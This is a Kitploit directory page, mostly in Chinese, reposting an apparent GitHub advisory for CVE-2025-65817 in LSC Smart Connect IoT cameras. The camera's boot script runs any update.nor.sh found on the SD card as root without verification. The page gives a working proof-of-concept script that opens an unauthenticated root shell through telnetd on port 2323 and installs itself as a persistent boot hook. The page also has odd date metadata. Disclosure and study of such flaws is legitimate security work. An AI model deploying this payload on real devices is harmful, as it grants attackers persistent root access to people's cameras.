Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-65817 — Here is the CVE-2025-65817 | Kitploit
工具/GitHubGitHub/istaarkk/cve-2025-65817
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationHardware & IoT SecurityRemote Access Tool
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

Here is the CVE-2025-65817

查看仓库
98个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-65817


字段值
标题漏洞报告:LSC Smart Connect 摄像头
日期2024-02-15
描述滥用 SD 卡更新钩子,在 LSC Smart Connect 摄像头上生成远程 shell。
标签iot, vulnerability, cve
固件版本1.14.13

LSC Smart Connect 摄像头漏洞报告

发现的漏洞在于利用 start_app.sh 中的更新系统,更具体地说是通过 SD 卡挂载和 update.nor.sh 文件。

配置变量

root@kitploit:~
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

local/sbin/start_app.sh:50–99 部分盲目信任 SD 卡上名为 update.nor.sh 的任何文件。在启动过程中,该脚本:

  • 挂载 SD 卡,
  • 将 update.nor.sh 复制到 /tmp/update.nor.sh,
  • 对文件内容、完整性、权限或所有者 不做任何验证。

随后在启动序列中(local/sbin/start_app.sh:108–129),复制后的文件:

  • 被标记为可执行,
  • 以 root 身份 运行,
  • 执行时将 SD 卡挂载点作为参数传入。

该执行发生在 主 ipc_service 启动之前,意味着脚本在 最高权限环境 中运行,此时网络工具、看门狗功能和升级辅助工具均已可用。

可用工具

该漏洞利用是通过创建 shell 并开放 telnetd 端口(摄像头自带)实现的:

root@kitploit:~
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

概念验证

只需将一个 .sh 脚本写入 SD 卡并命名为 update.nor.sh 即可。

我选择的利用脚本为:

root@kitploit:~
#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

我们确认端口已开放。

替代文本

通过 Telnet 连接:

替代文本

下载工具